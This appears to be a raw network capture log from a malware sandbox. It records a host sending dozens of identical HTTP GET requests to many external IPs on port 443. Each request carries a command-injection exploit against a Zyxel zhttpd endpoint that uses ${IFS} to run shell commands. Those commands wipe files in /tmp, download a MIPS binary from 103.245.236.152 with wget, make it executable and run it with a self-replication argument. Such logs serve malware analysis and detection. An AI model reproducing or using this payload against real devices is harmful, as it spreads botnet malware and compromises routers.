                                        Jan 14, 2024 16:18:34.212373018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1597192.168.2.1356002165.216.50.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.212426901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1598192.168.2.1348932179.253.115.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.212480068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1599192.168.2.1357836196.250.151.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.212516069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1600192.168.2.1351986137.115.42.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.212573051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1601192.168.2.133886672.178.218.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.212620974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1602192.168.2.1334908158.6.91.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.212676048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1603192.168.2.134523240.53.72.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.212747097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1604192.168.2.1344236184.53.16.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.212783098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1605192.168.2.135727089.22.239.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.212857008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1606192.168.2.134907623.119.18.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.212908030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1607192.168.2.1356694163.190.35.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.212961912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1608192.168.2.1340232209.210.182.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.213009119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1609192.168.2.1359118193.190.133.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.213068962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1610192.168.2.1340470221.115.119.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.213129044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1611192.168.2.1359344114.142.147.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.213268042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1612192.168.2.1335860116.126.236.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.213268995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1613192.168.2.1354954201.80.95.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.213289976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1614192.168.2.133504453.255.242.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.213375092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1615192.168.2.135882447.124.129.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.213429928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1616192.168.2.133349020.24.9.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.213483095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1617192.168.2.1355806140.230.121.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.213565111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1618192.168.2.1342152133.112.38.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.213615894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1619192.168.2.1350076136.100.249.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.213685989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1620192.168.2.1351474217.68.124.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.213735104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1621192.168.2.1353882181.6.146.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.213892937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1622192.168.2.136083278.237.108.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.213949919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1623192.168.2.1339320187.96.74.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.213974953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1624192.168.2.134675459.60.79.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214040995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1625192.168.2.1336836140.182.86.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214097023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1626192.168.2.135155646.24.32.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214179039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1627192.168.2.133518020.28.142.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214225054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1628192.168.2.136079268.188.235.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214278936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1629192.168.2.1352726146.74.23.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214337111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1630192.168.2.135034082.85.158.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214399099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1631192.168.2.1347750131.95.165.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214453936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1632192.168.2.1350970169.197.196.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214509964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1633192.168.2.134428434.26.31.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214587927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1634192.168.2.1357030211.117.46.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214634895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1635192.168.2.1359618138.147.131.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214699984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1636192.168.2.135087646.11.210.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214770079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1637192.168.2.133996235.200.206.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214801073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1638192.168.2.1351212191.17.69.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214852095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1639192.168.2.134103019.239.74.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214904070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1640192.168.2.1358532133.102.29.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214941978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1641192.168.2.1355676216.233.254.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.214967012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1642192.168.2.1336828129.26.57.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215051889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1643192.168.2.1343142190.210.222.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215101957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1644192.168.2.1359896193.223.160.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215157986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1645192.168.2.1337648179.76.165.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215204954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1646192.168.2.134073414.213.102.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215241909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1647192.168.2.133645072.91.133.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215293884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1648192.168.2.1333490190.177.49.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215351105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1649192.168.2.133863494.77.29.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215390921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1650192.168.2.135725877.107.120.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215436935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1651192.168.2.1358514108.113.43.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215476036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1652192.168.2.1337828109.55.111.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215548992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1653192.168.2.134598887.242.123.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215611935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1654192.168.2.1354616137.47.198.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215656996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1655192.168.2.135952477.184.133.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215730906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1656192.168.2.1356426187.198.102.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215770960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1657192.168.2.133916696.134.76.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215835094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1658192.168.2.135169895.130.23.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.215862036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1659192.168.2.134386441.251.171.104443
                                        TimestampBytes transferredDirectionData
